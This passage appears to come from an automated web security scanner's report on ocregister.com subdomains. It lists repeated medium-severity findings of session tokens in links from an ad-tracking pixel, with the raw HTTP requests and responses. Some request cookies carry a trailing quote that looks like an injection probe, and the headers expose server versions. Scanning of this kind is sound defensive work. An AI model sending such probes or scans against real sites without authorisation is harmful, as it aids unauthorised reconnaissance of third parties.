Date: Thu, 03 Feb 2011 16:11:22 GMT
Connection: keep-alive


11.14. http://lagunahomes.ocregister.com/2011/02/02/oceanfront-with-killer-views-a-deal/14224/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://lagunahomes.ocregister.com
Path:   /2011/02/02/oceanfront-with-killer-views-a-deal/14224/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/02/02/oceanfront-with-killer-views-a-deal/14224/ HTTP/1.1
Host: lagunahomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:05:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lagunahomes.ocregister.com/xmlrpc.php
Link: <http://lagunahomes.ocregister.com/?p=14224>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:05:57 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.15. http://lagunahomes.ocregister.com/2011/02/03/laguna-beach-home-sales-up-13-over-year/14020/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://lagunahomes.ocregister.com
Path:   /2011/02/03/laguna-beach-home-sales-up-13-over-year/14020/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/02/03/laguna-beach-home-sales-up-13-over-year/14020/ HTTP/1.1
Host: lagunahomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:05:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Thu, 03 Feb 2011 19:05:33 +0000
Cache-Control: max-age=279, must-revalidate
X-Pingback: http://lagunahomes.ocregister.com/xmlrpc.php
Link: <http://lagunahomes.ocregister.com/?p=14020>; rel=shortlink
Connection: close
Content-Type: text/html
Content-Length: 53064

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.16. http://lansner.ocregister.com/2011/02/02/a-new-home-for-kobe-bryant/97596/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://lansner.ocregister.com
Path:   /2011/02/02/a-new-home-for-kobe-bryant/97596/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/02/02/a-new-home-for-kobe-bryant/97596/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Thu, 03 Feb 2011 19:02:32 +0000
Cache-Control: max-age=91, must-revalidate
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Link: <http://lansner.ocregister.com/?p=97596>; rel=shortlink
Connection: close
Content-Type: text/html
Content-Length: 115709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.17. http://lansner.ocregister.com/2011/02/02/homebuilding-slump-now-3-years-old/98070/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://lansner.ocregister.com
Path:   /2011/02/02/homebuilding-slump-now-3-years-old/98070/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/02/02/homebuilding-slump-now-3-years-old/98070/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Thu, 03 Feb 2011 19:04:27 +0000
Cache-Control: max-age=206, must-revalidate
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Link: <http://lansner.ocregister.com/?p=98070>; rel=shortlink
Connection: close
Content-Type: text/html
Content-Length: 101944

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.18. http://lansner.ocregister.com/2011/02/03/orange-county-property/98182/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://lansner.ocregister.com
Path:   /2011/02/03/orange-county-property/98182/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/02/03/orange-county-property/98182/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Thu, 03 Feb 2011 19:02:02 +0000
Cache-Control: max-age=61, must-revalidate
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Link: <http://lansner.ocregister.com/?p=98182>; rel=shortlink
Connection: close
Content-Type: text/html
Content-Length: 140260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.19. http://lansner.ocregister.com/category/outlooks/eyeball-11/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://lansner.ocregister.com
Path:   /category/outlooks/eyeball-11/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /category/outlooks/eyeball-11/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.20. http://mortgage.ocregister.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:07:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Thu, 03 Feb 2011 19:07:07 +0000
Cache-Control: max-age=294, must-revalidate
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html
Content-Length: 99712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.21. http://mortgage.ocregister.com/2007/02/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2007/02/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2007/02/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 82043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.22. http://mortgage.ocregister.com/2007/03/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2007/03/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2007/03/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.23. http://mortgage.ocregister.com/2007/04/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2007/04/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2007/04/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.24. http://mortgage.ocregister.com/2007/05/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2007/05/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2007/05/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.25. http://mortgage.ocregister.com/2007/06/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2007/06/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2007/06/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81798

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.26. http://mortgage.ocregister.com/2007/07/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2007/07/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2007/07/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.27. http://mortgage.ocregister.com/2007/08/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2007/08/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2007/08/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 85164

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.28. http://mortgage.ocregister.com/2007/09/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2007/09/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2007/09/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.29. http://mortgage.ocregister.com/2007/10/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2007/10/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2007/10/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.30. http://mortgage.ocregister.com/2007/11/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2007/11/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2007/11/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.31. http://mortgage.ocregister.com/2007/12/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2007/12/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2007/12/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.32. http://mortgage.ocregister.com/2008/01/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2008/01/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2008/01/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.33. http://mortgage.ocregister.com/2008/02/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2008/02/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2008/02/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


